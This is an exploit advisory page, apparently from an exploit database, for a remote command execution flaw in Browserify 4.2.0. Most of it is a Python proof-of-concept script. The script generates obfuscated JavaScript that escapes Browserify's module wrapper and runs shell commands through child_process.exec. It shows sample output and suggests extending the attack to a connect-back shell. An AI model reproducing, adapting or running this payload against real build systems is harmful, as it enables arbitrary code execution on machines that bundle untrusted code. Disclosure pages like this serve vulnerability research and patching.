Browserify 4.2.0 Remote Command Execution

2014.07.16
Credit: Cal Leeming
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/python """ Browserify POC exploit http://iops.io/blog/browserify-rce-vulnerability/ To run, just do: $ python poc.py > exploit.js $ browserify exploit.js BITCH I TOLD YOU THIS SHIT IS FABULOUS [[garbage output]] },{}]},{},[1]) 00:08:32 up 12:29, 3 users, load average: 0.00, 0.02, 0.05 uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse) You can also spawn() and create a connect back shell. Enjoy """ def charencode(string): encoded='' for char in string: encoded=encoded+","+str(ord(char)) return encoded[1:] plaintext = """ var require = this.process.mainModule.require; var sys = require('sys') var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("uptime && id", puts); console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS"); """ payload = charencode(plaintext) final = "eval(String.fromCharCode(%s));" %(payload) print "});" print final print "(function(){"

References:

http://iops.io/blog/browserify-rce-vulnerability/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top